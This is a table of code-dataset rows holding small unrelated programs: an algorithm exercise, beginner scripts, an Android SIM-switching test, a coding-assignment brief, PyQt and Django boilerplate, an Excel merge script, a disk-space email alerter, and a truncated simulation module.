blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
306227841f80245f5047fbba2b62ba161beaf1f7 | 6514c510c314a3345295303f4cb2289b66dc597e | /Three_Sum.py | 9914c98a6aa74d9e595c014aeacdecf9ec5d28c6 | [] | no_license | liuqm2018/Data-structure-and-algorithm | 219851bc545457b9d65ac8d12472b10637644dbf | c0eb3c446b9265a1d50e52919944b72692256f15 | refs/heads/master | 2022-12-09T10:51:09.468511 | 2020-09-01T02:17:37 | 2020-09-01T02:17:37 | 276,517,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 941 | py | class Solution():
def Three_Sum(self,nums):
n = len(nums)
if (not nums or n < 3):
return []
nums.sort()
res = []
for i in range(n):
if nums[i] > 0 :
return res
if (i>0 and nums[i]==nums[i-1]):
continue
L=i+1
R=n-1
while L<R:
if (nums[i]+nums[L]+nums[R]==0):
res.append([nums[i],nums[L],nums[R]])
while(L<R and nums[L]== nums[L+1]):
L = L+1
while (L<R and nums[R]== nums[R-1]):
R = R -1
L = L+1
R = R-1
elif (nums[i]+nums[L]+nums[R]<0):
L = L+1
else:
R = R-1
return res
a = Solution()
print(a.Three_Sum([-1,0,1,2,-1,-4])) | [
"noreply@github.com"
] | noreply@github.com |
bb1f22ce8400a51121f13f2f316a4980e4e292d2 | a690f025cf0e775c6fcd5f1fed4cf43c72941b16 | /main.py | 1e388697aa6524885a4b24448ca967756bd6d863 | [] | no_license | VishamPathak/concatenation-input-type-cast | cdb04bb381017ee62602d96637a09d05c3889911 | 9f3cf1fc71c84d1f2c77650a1869d4eb4b899d0f | refs/heads/master | 2023-02-17T00:57:42.596464 | 2021-01-15T00:20:17 | 2021-01-15T00:20:17 | 329,766,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 642 | py | print("Hello"+ " " + "World"+ " today"" is "+"Thursday")
#this is concatenation
print("This starts a new line")
print()
print("Tomorrow is Friday")
#if adding strings is called "concatenation"
#what is + for integers called? addition
#5 + 4 = 9
print("5" + "4") #concatenation
print(5 + 4) #addition
firstName = "Visham"
print("my name is " + firstName)
age = 12 #integer
print("my age is " + str(age))
#firstName != FirstName
userName = input("What is your name? ")
print("Hey " + userName)
#ask user for their birth year
userBirth = int(input("When is your birth year? "))
print("Wow you are " + str(2021-userBirth) + " years old!")
| [
"110142@eesd.org"
] | 110142@eesd.org |
ee28feb673f3427a13e2672a15ccea190aa77ad7 | 420df99ff70cbdd6eac69550d1cc27c5b56c82e7 | /interaction_2sim_lg/N05_2SIM_1094_OCSim1_Sim2Mode_00_IMS.py | aaf431b6f122eadf177855a8018e17c688d54e2a | [] | no_license | JiaoHu0123/Python | 9def966c7190aa2fa103774d040f054159ca4977 | d65e1acb605f212b0f5cd1aef88d77388ffbd973 | refs/heads/master | 2020-06-22T21:57:04.341679 | 2017-06-13T15:07:57 | 2017-06-13T15:07:57 | 94,225,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,243 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on 2016-8-25
@author: panpan.wei
ScriptName:SLAB_N05_Interaction_2SIM_1094_OpenCloseSim1_Sim2ModeChange_00_IMS.py(IMS)
Function: 1. Close Vice Sim2,Open Vice card SIM2,the main card data card still Sim1
2. Sim1 modechange,Set to default settings
3. loop step1-2
'''
import android
import ConfigParser # get config file data
import os, sys # use for path
import time # use for time
#import re # rename slog name
# define vars
caseTimeOut = 200
config = ConfigParser.ConfigParser()
BASE_DIR = os.path.dirname(__file__) # test scripts path name #get parent path
parent_dir = os.path.split(BASE_DIR)
Par_DIR = parent_dir[0]
Setting_path = os.path.join(Par_DIR, 'Settings.ini')
config.readfp(open(Setting_path, 'r'))
droid = android.Android(scriptname=__file__)
basic_path = os.path.abspath(Par_DIR)
droid.log(basic_path)
sys.path.append(basic_path)
import basic.importMethod
basic.importMethod.importMethod()
defaultMode = droid.getCommandReturn("GetNetworkMode")
droid.log("===================defualtMode=" + defaultMode)
from basic import common
from basic import net
from basic import call
droid.setCaseTimeOut(caseTimeOut)
passTimes = 0
failTimes = 0
phoneId = 1 # 0-sim1;1-sim2
testTimes = config.get("Setting", "interaction") # get test times
hold_time = config.get("Setting", "callHoldTime")
emcNum = config.get("CallNum", "emc")
droid.log("The test times is " + testTimes)
nwObject = net.NetWork(scriptname = __file__)
commObject = common.Common(scriptname = __file__)
callObject=call.MMC(scriptname = __file__)
print droid.log("parent path=" + BASE_DIR)
print droid.log("parent_dir=" + Par_DIR)
print droid.log(" =============================signal sim,open close sim card==========================")
defaultModeInt = nwObject.getModeStrToInt(defaultMode)
droid.log("the default mode int is " + str(defaultModeInt))
version = droid.getCommandReturn("GetSoftwareVersion")
casename = droid.scriptname
cardtype = "DUAL"
sim = callObject.getMainCard(droid)
network = nwObject.getNetClass(droid, sim)
simtype = callObject.getSimType(droid, sim)
sim = callObject.getMainCard(droid)
network = nwObject.getNetClass(droid, sim)
simtype = callObject.getSimType(droid, sim)
cardtype = "DUAL"
droid.log("===sim=" + sim + "===network=" + network + "===simtype=" + simtype)
version = droid.getCommandReturn("GetSoftwareVersion")
casename = droid.scriptname
#==================================================================================
Status, ResultCause, SIM1Status, SIM2Status, Network1Status, Network2Status = nwObject.CheckCurrentSIMandNWStatus(droid, 2, "MULTI", "L+G", "SingleVolte")
# nwObject.CheckCurrentSIMandNWStatus(droid, expSimNum, expNWMode, expDualMode, expIMSStatus)
# expNWMode, expDualMode
# expSimNum={0,1,2}
# expNWMode={LTE,WCDMA,TDSCDMA,GGE}
# expIMSStatus={DualVolte,SingleVolte,NoVolte}
commObject.summary(droid, "IMS", "MULTI", simtype, "Card Switch", "L+G", "120", SIM1Status, SIM2Status, Network1Status, Network2Status)
if "NA" in Status:
droid.log("summary:NOT_SUPPORT")
exit()
elif "Fail" in Status:
droid.log("CriticalError: SIM Status ERROR or Network ERROR")
exit()
else:
droid.log("Sim Status Is Normal")
#============================================================================================================
defaultMode = droid.getCommandReturn("GetNetworkMode")
droid.log("===================defualtMode=" + defaultMode)
if "LTE" in defaultMode:
supportLTE = True
elif "AUTO" in defaultMode:
droid.log("AUTO MODE")
supportLTE = True
else:
supportLTE = False
droid.log("supportLTE=" + str(supportLTE))
volteFlag = nwObject.checkVolte(droid, sim)
if network == "4G" and volteFlag:
droid.log("--------4g_ims--------------")
netvolte = True
elif supportLTE:
nwObject.startSearchNet(droid, sim)
nwObject.selLTE(droid, simtype)
volteFlag = nwObject.checkVolte(droid, sim)
droid.log("--------4g_ims--------------")
netvolte = True
else:
netvolte = False
droid.log("------no_ims--------------")
#====================================================================================
def ReturnMode():
if nwObject.backDefaultMode(droid, defaultModeInt, sim):
return True
droid.log("set DefaultMode pass")
else:
droid.log("set DefaultMode fail")
return False
def CloseSim(sim):
if nwObject.closeSim(droid, sim):
passFlag = True
else:
passFlag = False
return passFlag
def OpenSim(sim):
if nwObject.openSim(droid, sim):
passFlag1 = True
else:
passFlag1 = False
return passFlag1
def ModeChange_EDC():
global passTimes, failTimes
for i in range(1, int(testTimes) + 1):
droid.log("This is the " + str(i) + " times test:")
callObject.setMainCard(droid, 0)
time.sleep(30)
callObject.setDataCard(droid, 0)
time.sleep(20)
closeSim = CloseSim(0)
time.sleep(40)
Modechange = nwObject.checkANDSetMode(droid)
time.sleep(40)
openSim = OpenSim(0)
time.sleep(30)
defaultModeFlag = ReturnMode()
time.sleep(40)
if Modechange & defaultModeFlag & closeSim & openSim:
passTimes += 1
else:
failTimes += 1
droid.log("=====================PASS: " + str(passTimes) + "; FAIL: " + str(failTimes))
callObject.setPreCondition(droid, 0, 0)
time.sleep(30)
#============================================================================================================
if droid.sendCommand("IsPluginSimCard 0", "OK") and droid.sendCommand("IsPluginSimCard 1", "OK"):
cardtype = "DUAL"
droid.log("************************************pluginSim two card=================================")
sim1type = callObject.getSimType(droid, 0)
net1 = nwObject.getNetClass(droid, 0)
sim2type = callObject.getSimType(droid, 1)
net2 = nwObject.getNetClass(droid, 1)
droid.log("sim1 simtype=" + sim1type + "sim2 simtype=" + sim2type)
droid.log("sim1 net=" + net1 + "sim2 net=" + net2)
if net1 == "UNKNOW":
droid.log("main card sim1 no service, wait 20s,check again")
time.sleep(20)
net1 = nwObject.getNetClass(droid, 0)
droid.log("sim1 net=" + str(net1))
elif net2 == "UNKNOW":
droid.log("main card sim2 no service, wait 20s,check again")
time.sleep(20)
net2 = nwObject.getNetClass(droid, 1)
droid.log("sim2 net=" + str(net2))
else:
droid.log("have service")
ModeChange_EDC()
elif droid.sendCommand("IsPluginSimCard 0", "OK"):
cardtype = "SINGLE1"
droid.log("summary:NOT_SUPPORT")
exit()
elif droid.sendCommand("IsPluginSimCard 1", "OK"):
cardtype = "SINGLE2"
droid.log("summary:NOT_SUPPORT")
exit()
else:
droid.log("just plugin one simCard or no simCard")
network = "NO_NET"
simtype = "NO_SIM"
cardtype = "NO_SIM"
droid.log("summary:NOT_SUPPORT")
exit()
commObject.result(droid,testTimes, passTimes, failTimes)
| [
"张毅"
] | 张毅 |
d4c5af2c37f2669d2f4c55e79ac64f1d74e26cbd | 840bbdcbc8633b09953262a4bee638b9f1c24def | /Unit 3 Sprint 1 Instructions.py | 1e6ebab7ee3f6bea7098c9b7651981c844d01747 | [
"MIT"
] | permissive | ValerieLangat/DS-Unit-3-Sprint-1-Software-Engineering | 0bde29cd39e6c7aa1f6b7562cf22e1904fc2fb30 | 2e0f3d41d58e5012329a438eef112d8d1f98d035 | refs/heads/master | 2020-06-17T08:38:16.681083 | 2019-07-15T02:25:39 | 2019-07-15T02:25:39 | 195,865,007 | 0 | 0 | null | 2019-07-08T18:21:26 | 2019-07-08T18:21:25 | null | UTF-8 | Python | false | false | 11,128 | py | # Data Science Unit 3 Sprint Challenge 1
## Software Engineering - the Acme Way
In this sprint challenge you will write code and answer questions related to
object-oriented programming, code style/reviews, containers, and testing. You
may use any tools and references you wish, but your final code should reflect
*your* work and be saved in `.py` files (*not* notebooks), and (along with this
file including your written answers) added to your
`DS-Unit-3-Sprint-1-Software-Engineering` repository.
For all your code, you may only import/use the following:
- Other modules you write
- `unittest` (from the standard library)
- `random` (from the standard library)
As always, make sure to manage your time - get a section/question to "good
enough" and then move on to make sure you do everything. You can always revisit
and polish at the end if time allows.
This file is Markdown, so it may be helpful to add/commit/push it first so you
can view it all nice and rendered on GitHub.
Good luck!
### Part 1 - Keeping it Classy
As an employee of Acme Corporation, you're always looking for ways to better
organize the vast quantities and variety of goods your company manages and
sells. Everything Acme sells is considered a `Product`, and must have the
following fields (variables that live "inside" the class):
- `name` (string with no default)
- `price` (integer with default value 10)
- `weight` (integer with default value 20)
- `flammability` (float with default value 0.5)
- `identifier` (integer, automatically genererated as a random (uniform) number
anywhere from 1000000 to 9999999, includisve)(inclusive).
Write a Python `class` to model the above data. Make sure you are *precise* in
your field names and types, and that your class has an `__init__` constructor
method with appropriate defaults (or lack thereof).
*Hint* - `random.randint` should be able to serve your random number needs.
Save the class in `acme.py`, and you can test your code in a Python repl as
follows:
```python
>>> from acme import Product
>>> prod = Product('A Cool Toy')
>>> prod.name
'A Cool Toy'
>>> prod.price
10
>>> prod.weight
20
>>> prod.flammability
0.5
>>> prod.identifier
2812086 # your value will vary
```
### Part 2 - Objects that Go!
The class you wrote in part 1 is nice, but it doesn't *do* anything - that is,
it doesn't have any *methods*. So let's add some! Specifically, add two methods:
- `stealability(self)` - calculates the price divided by the weight, and then
returns a message: if the ratio is less than 0.5 return "Not so stealable...",
if it is greater or equal to 0.5 but less than 1.0 return "Kinda stealable.",
and otherwise return "Very stealable!"
- `explode(self)` - calculates the flammability times the weight, and then
returns a message: if the product is less than 10 return "...fizzle.", if it is
greater or equal to 10 but less than 50 return "...boom!", and otherwise
return "...BABOOM!!"
Save your code, and you can test as follows:
```python
>>> from acme import Product
>>> prod = Product('A Cool Toy')
>>> prod.stealability()
'Kinda stealable.'
>>> prod.explode()
'...boom!'
```
### Part 3 - A Proper Inheritance
Of course, Acme doesn't just sell generic products - it sells all sorts of
special specific things!
Make a subclass of `Product` named `BoxingGlove` that does the following:
- Change the default `weight` to 10 (but leave other defaults unchanged)
- Override the `explode` method to always return "...it's a glove."
- Add a `punch` method that returns "That tickles." if the weight is below 5,
"Hey that hurt!" if the weight is greater or equal to 5 but less than 15, and
"OUCH!" otherwise
Example test run:
```python
>>> from acme import BoxingGlove
>>> glove = BoxingGlove('Punchy the Third')
>>> glove.price
10
>>> glove.weight
10
>>> glove.punch()
'Hey that hurt!'
>>> glove.explode()
"...it's a glove."
```
### Part 4 - Class Report
Now you can represent your inventory - let's use these classes and write an
`acme_report.py` module to generate random products and print a summary of them.
For the purposes of these functions we will only use the `Product` class.
Your module should include two functions:
- `generate_products()` should generate a given number of products (default
30), randomly, and return them as a list
- `inventory_report()` takes a list of products, and prints a "nice" summary
For the purposes of generation, "random" means uniform - all possible values
should vary uniformly across the following possibilities:
- `name` should be a random adjective from `['Awesome', 'Shiny', 'Impressive',
'Portable', 'Improved']` followed by a space and then a random noun from
`['Anvil', 'Catapult' 'Disguise' 'Mousetrap', '???']`, e.g. `'Awesome Anvil'`
and `Portable Catapult'` are both possible
- `price` and `weight` should both be from 5 to 100 (inclusive and independent,
and remember - they're integers!)
- `flammability` should be from 0.0 to 2.5 (floats)
You should implement only depending on `random` from the standard library, your
`Product` class from `acme.py`, and built-in Python functionality.
For the report, you should calculate and print the following values:
- Number of unique product names in the product list
- Average (mean) price, weight, and flammability of listed products
At the bottom of `acme_report.py` you should put the following code:
Following is useful starting code for `acme_repory.py`:
```python
#!/usr/bin/env python
from random import randint, sample, uniform
from acme import Product
# Useful to use with random.sample to generate names
ADJECTIVES = ['Awesome', 'Shiny', 'Impressive', 'Portable', 'Improved']
NOUNS = ['Anvil', 'Catapult', 'Disguise', 'Mousetrap', '???']
def generate_products(num_products=30):
products = []
# TODO - your code! Generate and add random products.
return products
def inventory_report(products):
pass # TODO - your code! Loop over the products to calculate the report.
if __name__ == '__main__':
inventory_report(generate_products())
```
The last lines let you test by running `python acme_report.py`. You should see
output like:
```
$ python acme_report.py
ACME CORPORATION OFFICIAL INVENTORY REPORT
Unique product names: 19
Average price: 56.8
Average weight: 54.166666666666664
Average flammability: 1.258097155966675
```
It's OK for the specifics to vary (how you message/format), but it should output
and clearly identify all four relevant numbers.
### Part 5 - Measure twice, Test once
Make a file `acme_test.py` starting from the following code:
```python
#!/usr/bin/env python
import unittest
from acme import Product
from acme_report import generate_products, ADJECTIVES, NOUNS
class AcmeProductTests(unittest.TestCase):
"""Making sure Acme products are the tops!"""
def test_default_product_price(self):
"""Test default product price being 10."""
prod = Product('Test Product')
self.assertEqual(prod.price, 10)
if __name__ == '__main__':
unittest.main()
```
If you run the tests you should see output like:
```
$ python acme_test.py
.
----------------------------------------------------------------------
Ran 1 test in 0.000s
OK
```
Complete the following:
- Add at least *2* more test methods to `AcmeProductTests` for the base
`Product` class: at least 1 that tests default values (as shown), and one that
builds an object with different values and ensures their `stealability()` and
`explode()` methods function as they should
- Write a new test class `AcmeReportTests` with at least 2 test methods:
`test_default_num_products` which checks that it really does receive a list of
length 30, and `test_legal_names` which checks that the generated names for a
default batch of products are all valid possible names to generate (adjective,
space, noun, from the lists of possible words)
*Hint* - `test_legal_names` is the trickiest of these, but may not be as bad as
you think. Check out `assertIn` from `unittest`, and remember that Python is
pretty handy at string processing. But if you get stuck, move on and revisit.
Note that `inventory_report()` is pretty tricky to test, because it doesn't
*return* anything - it just prints (a "side-effect"). For the purposes of this
challenge, don't worry about testing it - but as a stretch goal/something to
think about, it's a good ponderer.
### Part 6 - Style it Up
If you did the earlier parts in an editor that was linting your code (warning
you about violations of [PEP8 style](https://pep8.org/)) and you listened to it,
you're already done!
If not, go back and fix things! If you don't have a built-in tool for checking,
you can use [PEP8 online](http://pep8online.com/).
Go for lint-free! If there's a stubborn warning or two you can't fix though,
it's okay to leave a comment explaining it and move on.
### Part 7 - Questions (and your Answers)
Acme Corporation isn't just a few `.py` files. If you want to grow in your
career here, you'll have to answer the following:
- What, in your opinion, is an important part of code reviews? That is, what is
something you pay attention to when you review code, and that you appreciate
when others do the same for your code?
- We have an awful lot of computers here, and it gets pretty confusing with
slightly different things running on all of them. How could containers help us
improve this situation?
Answer both of these questions (baseline ~5 sentences) here in text.
One of the more obvious benefits of a code review, but I'd consider the most
important is ensuring your code is decipherable. Whether someone's code is pristine
and runs perfectly or its completely inaccurate, it doesn't matter if no one can
interpret what your goals were with what was written. Something I pay attention
to is whether or not I'd have a clue what the goals of the code were if I had
little exposure the initial problem. I appreciate when people give me more concise
ways to write my code.
With everyone running different programs and program versions on their computer
at all times, it's important to create an environment that runs all code using
set programs and versions that stay the same no matter the machine it's running
on. This helps streamline and avoid unnecessary errors and confusion.
### Part 8 - Turn it in!
Add all the files you wrote (`acme.py`, `acme_report.py`, and `acme_test.py`),
as well as *this* file with your answers to part 7, to your weekly repo
(`DS-Unit-3-Sprint-1-Software-Engineering`). Commit, push, and await feedback
from Acme Corporation management. Thanks for your hard work!
*Bonus!* Got this far? Read up on the [history of the fine Acme
Corporation](https://en.wikipedia.org/wiki/Acme_Corporation), with decades of
quality products and many satisfied customers (mostly coyotes). | [
"noreply@github.com"
] | noreply@github.com |
295b9361ffd77b40023ebf9541906b70aa8a2786 | cfc70540b1f0305a159df75983429d73ecc01535 | /banned_users.py | 8470ce1c8a9c01f52534bfdbee3a9a6c92919422 | [] | no_license | LJZSR/python_work | a51a14000ef496c9ffa180b29e577f2d243819af | 9b36f71fb3ff92af8e38e86e8a1f8aaae5a7a1fe | refs/heads/master | 2020-04-08T22:04:31.058844 | 2018-12-15T09:37:30 | 2018-12-15T09:37:30 | 159,770,447 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | banned_user = ['andrew', 'carolina', 'david']
user = 'marie'
if user not in banned_user:
print(user.title() + ', you can post a response if you wish.')
| [
"jzs1996@sjtu.edu.cn"
] | jzs1996@sjtu.edu.cn |
6f9911154177eaa30d01ec8ca1ffa5a01d3d3ad4 | fa89502d32c5746555836bbf018292a6d69b7272 | /UI/Show2DWindow.py | 43cd11dfb0299b754f07d2530882b404ec15a098 | [] | no_license | mag420/ArchToCE | 7f7632ae184f151439e98780e2589541c8527706 | 9aff999f70645ea5c19e3821560e59f3d97d34fe | refs/heads/master | 2021-03-12T05:13:43.764073 | 2020-03-16T11:30:39 | 2020-03-16T11:30:39 | 246,592,210 | 0 | 0 | null | 2020-03-11T14:23:18 | 2020-03-11T14:23:18 | null | UTF-8 | Python | false | false | 4,549 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'Show2DWindowMod.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(845, 679)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.loadFile = QtGui.QPushButton(self.centralwidget)
self.loadFile.setGeometry(QtCore.QRect(630, 20, 96, 32))
self.loadFile.setObjectName(_fromUtf8("loadFile"))
self.listView = QtGui.QListView(self.centralwidget)
self.listView.setGeometry(QtCore.QRect(590, 140, 181, 331))
self.listView.setObjectName(_fromUtf8("listView"))
self.selectedFileLabel = QtGui.QLabel(self.centralwidget)
self.selectedFileLabel.setGeometry(QtCore.QRect(630, 70, 111, 20))
self.selectedFileLabel.setObjectName(_fromUtf8("selectedFileLabel"))
self.viewsLabel = QtGui.QLabel(self.centralwidget)
self.viewsLabel.setGeometry(QtCore.QRect(660, 110, 41, 20))
self.viewsLabel.setObjectName(_fromUtf8("viewsLabel"))
self.showLower = QtGui.QPushButton(self.centralwidget)
self.showLower.setGeometry(QtCore.QRect(620, 490, 111, 32))
self.showLower.setObjectName(_fromUtf8("showLower"))
self.tabWidget = QtGui.QTabWidget(self.centralwidget)
self.tabWidget.setGeometry(QtCore.QRect(20, 10, 541, 521))
self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
self.tab = QtGui.QWidget()
self.tab.setObjectName(_fromUtf8("tab"))
self.tabWidget.addTab(self.tab, _fromUtf8(""))
self.tab_2 = QtGui.QWidget()
self.tab_2.setObjectName(_fromUtf8("tab_2"))
self.tabWidget.addTab(self.tab_2, _fromUtf8(""))
self.sol2 = QtGui.QPushButton(self.centralwidget)
self.sol2.setGeometry(QtCore.QRect(150, 550, 111, 32))
self.sol2.setObjectName(_fromUtf8("sol2"))
self.sol1 = QtGui.QPushButton(self.centralwidget)
self.sol1.setGeometry(QtCore.QRect(10, 550, 111, 32))
self.sol1.setObjectName(_fromUtf8("sol1"))
self.merge = QtGui.QPushButton(self.centralwidget)
self.merge.setGeometry(QtCore.QRect(300, 550, 111, 32))
self.merge.setObjectName(_fromUtf8("merge"))
self.cross = QtGui.QPushButton(self.centralwidget)
self.cross.setGeometry(QtCore.QRect(450, 550, 111, 32))
self.cross.setObjectName(_fromUtf8("cross"))
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 845, 28))
self.menubar.setObjectName(_fromUtf8("menubar"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow", None))
self.loadFile.setText(_translate("MainWindow", "Load file", None))
self.selectedFileLabel.setText(_translate("MainWindow", "No file selected", None))
self.viewsLabel.setText(_translate("MainWindow", "Views", None))
self.showLower.setText(_translate("MainWindow", "showLower", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Tab 1", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Tab 2", None))
self.sol2.setText(_translate("MainWindow", "Solution2", None))
self.sol1.setText(_translate("MainWindow", "Solution1", None))
self.merge.setText(_translate("MainWindow", "GA", None))
self.cross.setText(_translate("MainWindow", "Cross", None))
| [
"bourahla.yasser@gmail.com"
] | bourahla.yasser@gmail.com |
0a3c3e004b4c9a3572278e882ef9351ba25c3947 | 7f36d8c9602e60cfaebecd6dabf0990a05d22d9c | /Teacher/wsgi.py | 3b2b347f64820930a6769e9a8671494884571760 | [] | no_license | Zobject/Teacher-in-Student | ca0e9bdc0e626512da82feabd6147352c96f858b | 1f589539c4d1738b23f8e55dd27e62bd0275899b | refs/heads/master | 2021-01-20T14:15:25.145483 | 2017-08-04T06:57:47 | 2017-08-04T06:57:47 | 90,575,511 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | """
WSGI config for Teacher project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Teacher.settings")
application = get_wsgi_application()
| [
"18920354189@163.com"
] | 18920354189@163.com |
bc84cec17b622273a208aaf0e2d3b9dfa807cb13 | 15df2e222af65e5b66183cf02e88e1a33a9cdde0 | /demo01/demo01/urls.py | 6e1e6756e59a59ce0436dee134f5b4770cda067f | [] | no_license | lukeddy/django_train | c45fbdbc24f446722a46e8801183a04e5f8b0bc2 | 5a333c767eeac53817f6deafbbba4b4fc2917c27 | refs/heads/master | 2021-05-28T07:09:22.458218 | 2014-10-12T15:07:19 | 2014-10-12T15:07:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,134 | py | from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'demo01.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
# url(r'^admin/', include(admin.site.urls)),
url(r'^blog/index/$', 'blog.views.index'),
url(r'^blog/category/$', 'blog.views.category'),
url(r'^blog/detail/$', 'blog.views.detail'),
url(r'^blog/detail3/$', 'blog.views.detail3'),
#CRUD
url(r'^blog/insert/$', 'blog.views.insert'),
url(r'^blog/list/$', 'blog.views.list_emps'),
#many2one
url(r'^blog/many2one_add/$', 'blog.views.test_add'),
url(r'^blog/many2one_add2/$', 'blog.views.test_add2'),
url(r'^blog/many2one_add3/$', 'blog.views.test_add3'),
url(r'^blog/many2one_find/$', 'blog.views.test_find'),
#many2many
url(r'^blog/many2many_test/$', 'blog.views2.test'),
url(r'^blog/many2many_add/$', 'blog.views2.add'),
url(r'^blog/many2many_find/$', 'blog.views2.find'),
url(r'^blog/many2many_update/$', 'blog.views2.update'),
url(r'^blog/many2many_del/$', 'blog.views2.delete'),
)
| [
"tzq618766@gmail.com"
] | tzq618766@gmail.com |
ab2d4fa2d240960dc8feb42e2b6cfb97950e633d | e53067b6c2240e325ae8f332e52a532eb9466ee3 | /Other_Stats/concat.py | 6f0a4764ddd8bc14dd1341730299d6dd662e1b06 | [] | no_license | KayZhang34/NBA-Draft-Exploration | dafeb89a154ae80f90e482dd4fe15bd3da5e329a | 44a46c96cc18901d717c5e497b7a8db754e7ce86 | refs/heads/main | 2023-03-03T07:01:42.669001 | 2021-02-18T00:53:29 | 2021-02-18T00:53:29 | 326,281,218 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 487 | py | import os
import pandas as pd
os.chdir(r'C:\Users\Kay\Desktop\Data Projects\DraftPick')
excel_names = []
for i in range(1,11):
excel_names.append("Modern_Draft_Position_" + str(i) + ".xlsx")
excels = [pd.ExcelFile(name) for name in excel_names]
frames = [x.parse(x.sheet_names[0], header=None,index_col=None)for x in excels]
frames[1:] = [df[2:] for df in frames[1:]]
combined = pd.concat(frames)
combined.to_excel("Modern_Draft_Position_All.xlsx", header=False, index=False) | [
"47289165+KayZhang34@users.noreply.github.com"
] | 47289165+KayZhang34@users.noreply.github.com |
1552891fd5e41a6a25834128ebd14c2019432926 | b46fe4bdfa289b521ed04761a525a8717fc58aa0 | /src/mainpackage/EmailUtil.py | 5df89339f80659103c8c08e5a28ee6919e4db4c3 | [] | no_license | alagarp/python-diskchecker-unix | 3452034aca1d0f45339c339e36505eb3ccd6e214 | a9f2f5d741e55f26f20c09f246f6300e0a6f2a9c | refs/heads/master | 2020-12-25T02:50:11.109348 | 2015-01-28T14:56:41 | 2015-01-28T14:56:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 873 | py | '''
Created on Sep 18, 2013
@author: panshul
'''
import smtplib
from email.mime.text import MIMEText
username="username@domain.com"
password="guessme"
def prepareMessage(dsf,recipients,machine):
message = format("Hello,\nFree disk space on %r is dangerously low. Please free some disk space urgently.\n The current stats are:\ntotal: %r GB used: %r GB free: %r GB" %(machine,dsf[0],dsf[1],dsf[2]))
msg = MIMEText(message)
msg['Subject'] = format("ALERT: Disk space low on %r" %(machine))
msg['From'] = username
msg['To'] = ','.join(recipients)
return msg
def sendDiskFullMail(dsf,recipients,machine):
msg = prepareMessage(dsf,recipients,machine)
s = smtplib.SMTP("smtp.gmail.com", 587)
s.ehlo()
s.starttls()
s.ehlo()
s.login(username,password)
s.sendmail(username, recipients, msg.as_string())
s.quit()
| [
"panshul007@gmail.com"
] | panshul007@gmail.com |
464dacbd4160b496abd2b05b0b7cff5ece2cfc0f | ce12cb8d9fb809d6d06cca035912bafebc3cd91f | /src/world.py | 2fce2cf0eb13e298f1aca8dfcdacf21258b27d6c | [
"MIT"
] | permissive | dapaulid/life | 287bd2476efccb585e8deee9671a2096a818007f | 365e717f4080b1a1439767d5119dfca0a15d194b | refs/heads/master | 2023-03-09T12:47:59.562809 | 2021-02-18T19:42:02 | 2021-02-18T19:42:02 | 297,053,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,940 | py | # -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
"""
@license
Copyright (c) Daniel Pauli <dapaulid@gmail.com>
This source code is licensed under the MIT license found in the
LICENSE file in the root directory of this source tree.
"""
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
# imports
#-------------------------------------------------------------------------------
#
import np
from statistic import TimingStat
import sys
#-------------------------------------------------------------------------------
# class definition
#-------------------------------------------------------------------------------
#
class World:
#---------------------------------------------------------------------------
# constants
#---------------------------------------------------------------------------
#
## default world radius if ommitted in constructor
